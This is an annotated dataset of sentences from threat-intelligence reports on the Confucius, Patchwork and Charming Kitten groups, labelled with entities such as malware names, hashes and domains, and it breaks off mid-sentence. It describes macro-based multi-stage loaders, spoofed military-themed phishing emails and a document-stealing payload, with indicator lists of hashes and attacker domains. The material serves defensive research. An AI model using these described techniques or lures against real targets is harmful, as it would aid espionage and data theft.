{"id":4254,"text":"The first involves a very simple routine that flips every bit of the string.","entities":[],"relations":[],"Comments":[]} {"id":4255,"text":"The second algorithm involves a hardcoded key, which is transformed by taking the five lower bits of each character, and then used as a XOR key.","entities":[],"relations":[],"Comments":[]} {"id":4256,"text":"In some cases, the key is split in half in the binary, so it is first reunited before being used.","entities":[],"relations":[],"Comments":[]} {"id":4257,"text":"Finally, our third algorithm uses a 94-character substitution table.","entities":[],"relations":[],"Comments":[]} {"id":4258,"text":"This algorithm was previously discussed by security researchers in a Confucius-related blog post.","entities":[{"id":50054,"label":"threat-actor","start_offset":69,"end_offset":78}],"relations":[],"Comments":[]} {"id":4259,"text":"For each of these routines, we found a recent sample going back to a domain name belonging to Patchwork’s infrastructure.","entities":[{"id":50055,"label":"threat-actor","start_offset":94,"end_offset":103}],"relations":[],"Comments":[]} {"id":4260,"text":"The substitution tables of the third algorithm were randomly generated at build time, while the attacker seemingly set the keys used in the second algorithm.","entities":[],"relations":[],"Comments":[]} {"id":4261,"text":"We found six different keys in the latter category that were different for the Patchwork and Confucius group.","entities":[{"id":50056,"label":"threat-actor","start_offset":79,"end_offset":88},{"id":50057,"label":"threat-actor","start_offset":93,"end_offset":102}],"relations":[],"Comments":[]} {"id":4262,"text":"Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":4263,"text":"On the left, Confucius code, on the right, Patchwork’s code","entities":[{"id":50058,"label":"threat-actor","start_offset":13,"end_offset":22},{"id":50059,"label":"threat-actor","start_offset":43,"end_offset":52}],"relations":[],"Comments":[]} {"id":4264,"text":"Interestingly, one of those keys, “xldbszcd”, was found in a file stealer used by Confucius (472ea4929c5e0fb4e29597311ed90a14c57bc67fbf26f81a3aac042aa3dccb55, Detected as TSPY_CONFSTEAL.A) as well as in two other file stealers.","entities":[{"id":50061,"label":"SHA2","start_offset":93,"end_offset":157},{"id":50062,"label":"malware","start_offset":171,"end_offset":187},{"id":50060,"label":"threat-actor","start_offset":82,"end_offset":91}],"relations":[{"id":909,"from_id":50061,"to_id":50062,"type":"indicates"},{"id":910,"from_id":50060,"to_id":50062,"type":"uses"}],"Comments":[]} {"id":4265,"text":"One file stealer (cca74bb322ad7833a21209b1418c9837e30983daec30d199a839f46075ee72f2, Detected as TSPY_DELF.SUW) published by security researchers in 2013 and linked to the domain myflatnet[.]com, was attributed by several parties to the Hangover group.","entities":[{"id":50067,"label":"threat-actor","start_offset":236,"end_offset":250},{"id":50063,"label":"SHA2","start_offset":18,"end_offset":82},{"id":50064,"label":"malware","start_offset":96,"end_offset":109},{"id":50065,"label":"TIME","start_offset":148,"end_offset":152},{"id":50066,"label":"DOMAIN","start_offset":178,"end_offset":193}],"relations":[{"id":911,"from_id":50063,"to_id":50064,"type":"indicates"},{"id":912,"from_id":50064,"to_id":50066,"type":"communicates-with"},{"id":913,"from_id":50064,"to_id":50067,"type":"attributed-to"}],"Comments":[]} {"id":4266,"text":"The other file stealer (1f0dabd61947b6df8a392b77a0eae33777be3caad13698aecc223b54ab4b859a, Detected as TROJ_DELF.XXWZ) is related to a domain reported in September 2016.","entities":[{"id":50069,"label":"malware","start_offset":102,"end_offset":116},{"id":50070,"label":"TIME","start_offset":153,"end_offset":167},{"id":50068,"label":"SHA2","start_offset":24,"end_offset":88}],"relations":[{"id":914,"from_id":50068,"to_id":50069,"type":"indicates"}],"Comments":[]} {"id":4267,"text":"That report also mentioned InPage software targeting and Delphi backdoors.","entities":[],"relations":[],"Comments":[]} {"id":4268,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} {"id":4269,"text":"Left: Confucius group, Middle: Hangover group, Right: Unnamed group","entities":[{"id":50071,"label":"threat-actor","start_offset":6,"end_offset":21},{"id":50072,"label":"threat-actor","start_offset":31,"end_offset":45},{"id":50073,"label":"threat-actor","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} {"id":4270,"text":"After some research, we found multiple Delphi backdoors that used any of the three decryption routines.","entities":[],"relations":[],"Comments":[]} {"id":4271,"text":"The backdoors also linked to an infrastructure matching old Hangover domains as well as the infrastructure of domains from the September 2016 blog post.","entities":[{"id":50074,"label":"TIME","start_offset":127,"end_offset":141},{"id":50075,"label":"threat-actor","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} {"id":4272,"text":"Some of these samples were several years old and had left the original name of the bit-flip decryption algorithm, which was “EnDecrypt”.","entities":[],"relations":[],"Comments":[]} {"id":4273,"text":"This algorithm matches the following code snippet.","entities":[],"relations":[],"Comments":[]} {"id":4274,"text":"Patchwork's Ongoing Campaigns","entities":[{"id":12808,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":4275,"text":"Aside from their Delphi malware, Patchwork is still active.","entities":[{"id":50076,"label":"threat-actor","start_offset":33,"end_offset":42}],"relations":[],"Comments":[]} {"id":4276,"text":"Lately, they have been sending multiple RTF files exploiting CVE-2017-8570.","entities":[{"id":50077,"label":"vulnerability","start_offset":61,"end_offset":74}],"relations":[],"Comments":[]} {"id":4277,"text":"The dropped payloads are modified versions of the Remote Administration Tool QuasarRAT that can be traced to the domains sastind-cn[.]org and tautiaos[.]com.","entities":[{"id":50080,"label":"DOMAIN","start_offset":142,"end_offset":156},{"id":50078,"label":"malware","start_offset":77,"end_offset":86},{"id":50079,"label":"DOMAIN","start_offset":121,"end_offset":137}],"relations":[{"id":915,"from_id":50078,"to_id":50079,"type":"communicates-with"},{"id":916,"from_id":50078,"to_id":50080,"type":"communicates-with"}],"Comments":[]} {"id":4278,"text":"Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":4279,"text":"Process tree after a successful infection","entities":[],"relations":[],"Comments":[]} {"id":4280,"text":"The attackers sometimes design the weaponized documents to look like legitimate documents of interest to the target.","entities":[],"relations":[],"Comments":[]} {"id":4281,"text":"The documents are also unusually large — often more than 10 megabytes.","entities":[],"relations":[],"Comments":[]} {"id":4282,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":4283,"text":"On the left, the weaponized document.","entities":[],"relations":[],"Comments":[]} {"id":4284,"text":"On the right, the legitimate document from CSBA.","entities":[{"id":50081,"label":"identity","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} {"id":4285,"text":"Note that the weaponized document was crafted to look like it came from CSBA but does not imply that CSBA or its related assets have been compromised ","entities":[{"id":50082,"label":"identity","start_offset":72,"end_offset":76},{"id":50083,"label":"identity","start_offset":101,"end_offset":105}],"relations":[],"Comments":[]} {"id":4286,"text":"The group still uses the Badnews malware, a backdoor with information-stealing and file-executing capabilities, albeit updated with a slight modification in the encryption routine at the end of 2017, when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost.","entities":[{"id":50084,"label":"malware","start_offset":25,"end_offset":40},{"id":50085,"label":"attack-pattern","start_offset":58,"end_offset":78},{"id":50086,"label":"attack-pattern","start_offset":83,"end_offset":97},{"id":50087,"label":"TIME","start_offset":187,"end_offset":198},{"id":50088,"label":"threat-actor","start_offset":294,"end_offset":303}],"relations":[{"id":917,"from_id":50084,"to_id":50085,"type":"uses"},{"id":918,"from_id":50084,"to_id":50086,"type":"uses"}],"Comments":[]} {"id":4287,"text":"Defending against Confucius and Patchwork Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective.","entities":[{"id":50089,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50090,"label":"threat-actor","start_offset":32,"end_offset":41},{"id":50091,"label":"threat-actor","start_offset":61,"end_offset":70},{"id":50092,"label":"threat-actor","start_offset":75,"end_offset":84}],"relations":[],"Comments":[]} {"id":4288,"text":"To help combat these kinds of threats organizations will need to take a more proactive and focused security posture that can cover the most ground in terms of security.","entities":[],"relations":[],"Comments":[]} {"id":4289,"text":"Some specific security measures organizations can implement: Recognize social engineering attempts.","entities":[],"relations":[],"Comments":[]} {"id":4290,"text":"Malicious mobile apps are common infection vectors for cybercriminals, as they can attract specific target audiences.","entities":[],"relations":[],"Comments":[]} {"id":4291,"text":"In this case, Confucius went with the common adage “sex sells” Proactively monitor the organization’s network.","entities":[{"id":50093,"label":"threat-actor","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} {"id":4292,"text":"Threat actors are notorious for creating stealthy malware that can bypass superficial network monitoring.","entities":[],"relations":[],"Comments":[]} {"id":4293,"text":"A more proactive stance that includes proper application of firewalls and intrusion detection and prevention systems can help mitigate the impact of an attack Implement network segmentation.","entities":[],"relations":[],"Comments":[]} {"id":4294,"text":"Even with the best security technology, there is still a chance of an attack slipping through.","entities":[],"relations":[],"Comments":[]} {"id":4295,"text":"Separating the network into individual parts, as well as restricting access to only those who really need it, can mitigate the damage that occurs in case of a successful attack.","entities":[],"relations":[],"Comments":[]} {"id":4296,"text":"Update systems regularly.","entities":[],"relations":[],"Comments":[]} {"id":4297,"text":"Everything from endpoints to network software to IoT devices should be patched and updated to prevent or minimize the chance of a threat actor exploiting a vulnerability In an ideal scenario, an organization’s in-house security team implement all of these and other security measures.","entities":[],"relations":[],"Comments":[]} {"id":4298,"text":"The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks.","entities":[{"id":50094,"label":"threat-actor","start_offset":143,"end_offset":152}],"relations":[],"Comments":[]} {"id":4299,"text":"Since these teams also handle the day-to-day IT requirements of the organization, taking on a more involved and proactive stance may not be easy.","entities":[],"relations":[],"Comments":[]} {"id":4300,"text":"In this case, an organization can look into third party security providers who can handle specialized work, such as root cause analysis and detailed research, and also provide a remediation plan that gives organizations a better chance against advanced threats.","entities":[],"relations":[],"Comments":[]} {"id":4301,"text":"Trend Micro Solutions Patchwork uses email as an entry point, which is why securing the email gateway is important.","entities":[{"id":50095,"label":"identity","start_offset":0,"end_offset":11},{"id":50096,"label":"threat-actor","start_offset":22,"end_offset":31}],"relations":[],"Comments":[]} {"id":4302,"text":"Trend Micro™ Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. Trend Micro™ Email Inspector and InterScan™ Web Security prevent malware from ever reaching end users.","entities":[{"id":50097,"label":"SOFTWARE","start_offset":0,"end_offset":27},{"id":50098,"label":"attack-pattern","start_offset":132,"end_offset":146},{"id":50099,"label":"attack-pattern","start_offset":164,"end_offset":189},{"id":50100,"label":"attack-pattern","start_offset":148,"end_offset":158},{"id":50101,"label":"SOFTWARE","start_offset":222,"end_offset":250},{"id":50102,"label":"SOFTWARE","start_offset":255,"end_offset":278}],"relations":[],"Comments":[]} {"id":4303,"text":"At the endpoint level, Trend Micro™ Smart Protection Suites deliver several capabilities that minimize the impact of Patchwork’s attacks.","entities":[{"id":12917,"label":"threat-actor","start_offset":117,"end_offset":126},{"id":50103,"label":"SOFTWARE","start_offset":23,"end_offset":59}],"relations":[],"Comments":[]} {"id":4304,"text":"These solutions are powered by Trend Micro XGen™ security, which provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints.","entities":[{"id":50104,"label":"SOFTWARE","start_offset":31,"end_offset":48}],"relations":[],"Comments":[]} {"id":4305,"text":"It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protect physical, virtual, and cloud workloads.","entities":[],"relations":[],"Comments":[]} {"id":4306,"text":"This appendix contains the latest indicators of compromise (IOCs) related to the different groups.","entities":[],"relations":[],"Comments":[]} {"id":4307,"text":" Tags APT & Targeted Attacks | Endpoints | Research | Network","entities":[],"relations":[],"Comments":[]} {"id":4308,"text":"Introduction","entities":[],"relations":[],"Comments":[]} {"id":4309,"text":"While investigating the Confucius threat actor, we found a recent spear phishing campaign that utilizes Pegasus spyware-related lures to entice victims into opening a malicious document downloading a file stealer.","entities":[{"id":50105,"label":"attack-pattern","start_offset":66,"end_offset":80},{"id":50106,"label":"malware","start_offset":104,"end_offset":111}],"relations":[],"Comments":[]} {"id":4310,"text":"The NSO Group’s spyware spurred a collaborative investigation that found that it was being used to target high-ranking individuals in 11 different countries.","entities":[{"id":50108,"label":"threat-actor","start_offset":4,"end_offset":13}],"relations":[],"Comments":[]} {"id":4311,"text":"In this blog entry, we take a look at the lures used by the malicious actor and provide a short analysis of the file stealer used in the campaign, which was launched in early August.","entities":[{"id":50109,"label":"TIME","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} {"id":4312,"text":"The contents of the spear phishing email The campaign involves a two-step attack.","entities":[{"id":50110,"label":"attack-pattern","start_offset":20,"end_offset":34},{"id":50111,"label":"attack-pattern","start_offset":65,"end_offset":80}],"relations":[],"Comments":[]} {"id":4313,"text":"During the first phase, an email without a malicious payload containing content copied from a legitimate Pakistani newspaper’s article is sent to the target.","entities":[],"relations":[],"Comments":[]} {"id":4314,"text":"The sender address, which is spoofed, impersonates the PR wing of the Pakistani Armed Forces (info@ispr.gov.pk).","entities":[{"id":50113,"label":"identity","start_offset":70,"end_offset":92},{"id":50112,"label":"EMAIL","start_offset":94,"end_offset":110}],"relations":[],"Comments":[]} {"id":4315,"text":"Two days later, a second email — purportedly a warning from a Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target.","entities":[{"id":50115,"label":"malware","start_offset":91,"end_offset":98},{"id":50116,"label":"DOMAIN","start_offset":122,"end_offset":129},{"id":50114,"label":"identity","start_offset":62,"end_offset":80}],"relations":[],"Comments":[]} {"id":4316,"text":"The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk). Figure 1.","entities":[{"id":12964,"label":"EMAIL","start_offset":78,"end_offset":95}],"relations":[],"Comments":[]} {"id":4317,"text":"Spear-phishing email from early August.","entities":[{"id":50118,"label":"TIME","start_offset":32,"end_offset":38},{"id":50117,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":4318,"text":"Notice the insertion of logos from the Pakistani Army, Air Force, Navy, and PR department.","entities":[{"id":50120,"label":"identity","start_offset":55,"end_offset":64},{"id":50121,"label":"identity","start_offset":66,"end_offset":70},{"id":50122,"label":"identity","start_offset":76,"end_offset":89},{"id":50119,"label":"identity","start_offset":39,"end_offset":53}],"relations":[],"Comments":[]} {"id":4319,"text":" If the target clicks on either the link or on the “unsubscribe” link, it will download a Word document from the domain parinari[.]xyz.","entities":[{"id":50123,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":4320,"text":"The emails are sent either from an ExpressVPN exit node in Pakistan, or from a mail server under the attacker’s control.","entities":[{"id":50124,"label":"SOFTWARE","start_offset":35,"end_offset":45},{"id":50125,"label":"location","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":4321,"text":"Examining the encrypted document containing macros After entering the password mentioned in the message, a document containing macros is displayed on screen.","entities":[],"relations":[],"Comments":[]} {"id":4322,"text":" Figure 2. Malicious document containing macros ","entities":[{"id":50126,"label":"attack-pattern","start_offset":15,"end_offset":33}],"relations":[],"Comments":[]} {"id":4323,"text":"If the victim enables macros, the malicious code will be loaded.","entities":[],"relations":[],"Comments":[]} {"id":4324,"text":"If the victim enters any phone number and clicks “SUBMIT,” the text field will be replaced by the message “Phone Number Not Found.”","entities":[],"relations":[],"Comments":[]} {"id":4325,"text":"Behind the scenes, a .NET DLL file named skfk.txt, which is filled with content found inside the “Comments” property of the document, is created in the temporary directory.","entities":[{"id":50127,"label":"FILEPATH","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} {"id":4326,"text":"The file is then loaded in memory via PowerShell.","entities":[{"id":50128,"label":"tools","start_offset":38,"end_offset":48}],"relations":[],"Comments":[]} {"id":4327,"text":"Stage 1 is a simple download & execute program.","entities":[],"relations":[],"Comments":[]} {"id":4328,"text":"It downloads an ASCII file from the same domain and converts it into binary before loading it on to the memory and jump to a dynamic function.","entities":[],"relations":[],"Comments":[]} {"id":4329,"text":"Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it.","entities":[{"id":50129,"label":"DOMAIN","start_offset":63,"end_offset":77}],"relations":[],"Comments":[]} {"id":4330,"text":"Stage 3 is similar to stage 1, with the only change being the URL to retrieve the next stage.","entities":[],"relations":[],"Comments":[]} {"id":4331,"text":"Stage 4 is the final payload (analyzed in the next section).","entities":[],"relations":[],"Comments":[]} {"id":4332,"text":"it is never written in clear text to the file disk.","entities":[],"relations":[],"Comments":[]} {"id":4333,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":4334,"text":"File stealer loading scheme ","entities":[],"relations":[],"Comments":[]} {"id":4335,"text":"It should be noted that most of the compilation timestamps of these DLL files have been modified by the attacker to a year in the far future (2060, 2099 …), and the server IP addresses are often hidden behind CloudFlare.","entities":[{"id":50130,"label":"SOFTWARE","start_offset":209,"end_offset":219}],"relations":[],"Comments":[]} {"id":4336,"text":"Analysis of the file stealer","entities":[],"relations":[],"Comments":[]} {"id":4337,"text":"The final payload is a .NET DLL file designed to steal documents and images with the following extensions: File extension Description TXT Text file PDF PDF file PNG Image file in PNG format JPG Image file in JPG format DOC Word document XLS Excel document XLM Excel document with macros ODP OpenDocument Presentation ODS OpenDocument Sheet ODT OpenDocument Text RTF Rich Text Format file PPT PowerPoint document XLSX Excel document XLSM Excel document with macros DOCX Word document PPTX PowerPoint document JPEG Image file in JPEG format ","entities":[],"relations":[],"Comments":[]} {"id":4338,"text":"The “Documents,” “Downloads,” “Desktop,” and “Pictures” folders of every user","entities":[],"relations":[],"Comments":[]} {"id":4339,"text":"are checked.","entities":[],"relations":[],"Comments":[]} {"id":4340,"text":"The DLL file also examines drives other than C:","entities":[],"relations":[],"Comments":[]} {"id":4341,"text":". Figure 4. Code showing the main function of the file stealer ","entities":[],"relations":[],"Comments":[]} {"id":4342,"text":"When a file matching one of the listed extensions is found, its MD5 hash is calculated and compared to an exclusion list retrieved from the command-and-control (C&C) server pirnaram[.]xyz.","entities":[{"id":50131,"label":"DOMAIN","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} {"id":4343,"text":"If the hash is not listed, the file is sent via the C&C to a directory named after the concatenation of the machine name and the username.","entities":[],"relations":[],"Comments":[]} {"id":4344,"text":"The exclusion list is different for every machine name-username string.","entities":[],"relations":[],"Comments":[]} {"id":4345,"text":"Other campaigns","entities":[],"relations":[],"Comments":[]} {"id":4346,"text":"During our monitoring of Confucius, we came across a campaign delivering the same payload, using a different lure.","entities":[],"relations":[],"Comments":[]} {"id":4347,"text":"In this instance, the campaign impersonated the Pakistani Defense Housing Authority.","entities":[{"id":50132,"label":"identity","start_offset":48,"end_offset":83}],"relations":[],"Comments":[]} {"id":4348,"text":"Again, this threat actor’s interest in military personnel is obvious.","entities":[],"relations":[],"Comments":[]} {"id":4349,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":4350,"text":"Spear-phishing email from early August","entities":[{"id":50133,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":50134,"label":"TIME","start_offset":26,"end_offset":38}],"relations":[],"Comments":[]} {"id":4351,"text":" The lures used in an older campaign from April 2021 impersonated the Federal Board of Revenue.","entities":[{"id":50135,"label":"TIME","start_offset":45,"end_offset":55},{"id":50136,"label":"identity","start_offset":73,"end_offset":97}],"relations":[],"Comments":[]} {"id":4352,"text":"There were minor differences in tools, tactics, and procedures: the malicious document was directly attached to the spear phishing email — still encrypted — and the decryption password was sent in a different email.","entities":[{"id":50137,"label":"attack-pattern","start_offset":116,"end_offset":130}],"relations":[],"Comments":[]} {"id":4353,"text":"The first stage was also hidden in the “Comments” section.","entities":[],"relations":[],"Comments":[]} {"id":4354,"text":"However, the second stage contained the final payload, which was once again a file stealer with the exact same structure (a .NET DLL).","entities":[],"relations":[],"Comments":[]} {"id":4355,"text":"Instead of exfiltrating the files through PHP scripts, they were done via FTP server.","entities":[],"relations":[],"Comments":[]} {"id":4356,"text":"It should be noted that in some occasions, the threat actor sent spear-phishing emails from the domain name mailerservice[.]directory which we attributed to the Patchwork threat actor in previous research.","entities":[{"id":50138,"label":"attack-pattern","start_offset":65,"end_offset":79},{"id":50139,"label":"DOMAIN","start_offset":108,"end_offset":133},{"id":50140,"label":"threat-actor","start_offset":161,"end_offset":170}],"relations":[{"id":919,"from_id":50139,"to_id":50140,"type":"attributed-to"}],"Comments":[]} {"id":4357,"text":"We disclosed multiple links between Patchwork and Confucius threat actors in the past, so this came as no surprise to us.","entities":[{"id":50141,"label":"threat-actor","start_offset":36,"end_offset":45},{"id":50142,"label":"threat-actor","start_offset":50,"end_offset":59}],"relations":[],"Comments":[]} {"id":4358,"text":" The creative use of social engineering lures and how to defend against them","entities":[{"id":50143,"label":"attack-pattern","start_offset":21,"end_offset":45}],"relations":[],"Comments":[]} {"id":4359,"text":"In our previous research, we already found Confucius, which is known for targeting Pakistan military for espionage purposes, employing multiple file stealers.","entities":[{"id":50144,"label":"threat-actor","start_offset":43,"end_offset":52},{"id":50145,"label":"identity","start_offset":83,"end_offset":100}],"relations":[],"Comments":[]} {"id":4360,"text":"While the code quality of its payloads is not of the highest standard, this threat actor uses innovative techniques when crafting its malicious documents, such as hiding malicious code in the comments section, or using encrypted documents to prevent automatic analysis.","entities":[],"relations":[],"Comments":[]} {"id":4361,"text":"Therefore, it’s highly likely that Confucius will continue to experiment and try out different kinds of social engineering lures in future campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4362,"text":"Despite the variety of lures used by the threat actor, best security practices still apply to these attacks.","entities":[],"relations":[],"Comments":[]} {"id":4363,"text":"Users should always be wary and avoid clicking on any link or downloading any file from unsolicited emails or suspicious sources.","entities":[{"id":50146,"label":"attack-pattern","start_offset":62,"end_offset":128}],"relations":[],"Comments":[]} {"id":4364,"text":"Red flags such as unusual sender domains or grammatical and spelling errors are also a sign that the email is malicious in nature, or at the very least, should be approached with proper security protocols in mind.","entities":[],"relations":[],"Comments":[]} {"id":4365,"text":"The following security solutions can also protect users from email-based attacks: Trend Micro™ Cloud App Security – Enhances the security of Microsoft Office 365 and other cloud services via computer vision and real-time scanning.","entities":[{"id":50148,"label":"SOFTWARE","start_offset":142,"end_offset":162},{"id":50147,"label":"SOFTWARE","start_offset":83,"end_offset":114}],"relations":[],"Comments":[]} {"id":4366,"text":"It also protects organizations from email-based threats.","entities":[],"relations":[],"Comments":[]} {"id":4367,"text":"Trend Micro™ Deep Discovery™ Email Inspector – Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks. Indicators of Compromise Hashes of the malicious encrypted documents: SHA256 Detection name dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2 Trojan.W97M.CONFUCIUS.A 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07 Trojan.W97M.CONFUCIUS.B","entities":[{"id":50153,"label":"malware","start_offset":428,"end_offset":451},{"id":50149,"label":"SOFTWARE","start_offset":0,"end_offset":28},{"id":50150,"label":"SHA2","start_offset":271,"end_offset":335},{"id":50151,"label":"malware","start_offset":337,"end_offset":360},{"id":50152,"label":"SHA2","start_offset":362,"end_offset":426}],"relations":[{"id":920,"from_id":50150,"to_id":50151,"type":"indicates"},{"id":921,"from_id":50152,"to_id":50153,"type":"indicates"}],"Comments":[]} {"id":4368,"text":"508bcc1f3906f5641116cde26b830b43f38f9c68a32b67e03a3e7e3f920b1f4a","entities":[{"id":13098,"label":"SHA2","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} {"id":4369,"text":" Trojan.W97M.CONFUCIUS.B 654c7021a4482da21e149ded58643b279ffbce66badf1a0a7fc3551acd607312 Trojan.W97M.CONFUCIUS.C 712172b5b1895bbfcced961a83baa448e26e93e301be407e6b9dc8cb6526277f Trojan.Win32.DLOADR.TIOIBELQ","entities":[{"id":13099,"label":"SHA2","start_offset":26,"end_offset":90},{"id":13100,"label":"SHA2","start_offset":117,"end_offset":181},{"id":50154,"label":"malware","start_offset":1,"end_offset":24},{"id":50155,"label":"malware","start_offset":92,"end_offset":115},{"id":50156,"label":"malware","start_offset":183,"end_offset":211}],"relations":[{"id":922,"from_id":13099,"to_id":50154,"type":"indicates"},{"id":923,"from_id":13100,"to_id":50155,"type":"indicates"}],"Comments":[]} {"id":4370,"text":" URLs\/Domains\/IP Addresses Server hosting malicious documents parinari[.]xyz Server used for file exfiltration pirnaram[.]xyz Domain names linked to other campaigns","entities":[{"id":50157,"label":"DOMAIN","start_offset":73,"end_offset":87},{"id":50158,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":4371,"text":" pemra[.]email ispr[.]email fbr[.]news defencepk[.]email pakistanarmy[.]email pmogovpk[.]email mailerservice[.]directory file-dnld[.]com funtifu[.]live cnic-update[.]com cnic-ferify[.]live fbr-update[.]com download.fbr[.]tax support-team[.]tech api.priveetalk[.]com Sender email addresses latest_info@fbr.news notice@fbr.news alert@fbr.news thenewsinernational@mailerservice.directory","entities":[{"id":13101,"label":"EMAIL","start_offset":314,"end_offset":334},{"id":13102,"label":"EMAIL","start_offset":336,"end_offset":351},{"id":13103,"label":"EMAIL","start_offset":353,"end_offset":367},{"id":13104,"label":"EMAIL","start_offset":369,"end_offset":412},{"id":50166,"label":"DOMAIN","start_offset":128,"end_offset":143},{"id":50167,"label":"DOMAIN","start_offset":145,"end_offset":159},{"id":50161,"label":"DOMAIN","start_offset":30,"end_offset":40},{"id":50162,"label":"DOMAIN","start_offset":42,"end_offset":59},{"id":50163,"label":"DOMAIN","start_offset":61,"end_offset":81},{"id":50164,"label":"DOMAIN","start_offset":83,"end_offset":99},{"id":50159,"label":"DOMAIN","start_offset":1,"end_offset":14},{"id":50160,"label":"DOMAIN","start_offset":16,"end_offset":28},{"id":50165,"label":"DOMAIN","start_offset":101,"end_offset":126},{"id":50171,"label":"DOMAIN","start_offset":218,"end_offset":236},{"id":50172,"label":"DOMAIN","start_offset":238,"end_offset":257},{"id":50168,"label":"DOMAIN","start_offset":161,"end_offset":178},{"id":50169,"label":"DOMAIN","start_offset":180,"end_offset":198},{"id":50170,"label":"DOMAIN","start_offset":200,"end_offset":216},{"id":50173,"label":"DOMAIN","start_offset":259,"end_offset":279}],"relations":[],"Comments":[]} {"id":4372,"text":" Tags APT & Targeted Attacks | Cyber Crime | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4373,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50174,"label":"identity","start_offset":11,"end_offset":14},{"id":50178,"label":"identity","start_offset":162,"end_offset":180},{"id":50175,"label":"identity","start_offset":55,"end_offset":61},{"id":50176,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50177,"label":"threat-actor","start_offset":142,"end_offset":157}],"relations":[{"id":924,"from_id":50177,"to_id":50178,"type":"attributed-to"},{"id":925,"from_id":50176,"to_id":50177,"type":"duplicate-of"}],"Comments":[]} {"id":4374,"text":"For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50179,"label":"attack-pattern","start_offset":59,"end_offset":74},{"id":50181,"label":"identity","start_offset":181,"end_offset":199},{"id":50180,"label":"attack-pattern","start_offset":76,"end_offset":90}],"relations":[],"Comments":[]} {"id":4375,"text":"Now, we’re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} {"id":4376,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":13122,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50182,"label":"TIME","start_offset":3,"end_offset":16},{"id":50183,"label":"identity","start_offset":18,"end_offset":21},{"id":50188,"label":"attack-pattern","start_offset":90,"end_offset":105},{"id":50186,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50184,"label":"malware","start_offset":69,"end_offset":80},{"id":50185,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50187,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":926,"from_id":50184,"to_id":13122,"type":"authored-by"},{"id":927,"from_id":50184,"to_id":50188,"type":"uses"},{"id":928,"from_id":50184,"to_id":50185,"type":"targets"},{"id":929,"from_id":50184,"to_id":50186,"type":"targets"},{"id":930,"from_id":50184,"to_id":50187,"type":"targets"}],"Comments":[]} {"id":4377,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.","entities":[{"id":50189,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} {"id":4379,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50191,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":4380,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} {"id":4381,"text":"This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool.","entities":[{"id":50192,"label":"malware","start_offset":47,"end_offset":58},{"id":50194,"label":"malware","start_offset":110,"end_offset":131},{"id":50193,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} {"id":4382,"text":"HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":13145,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":50195,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4383,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s 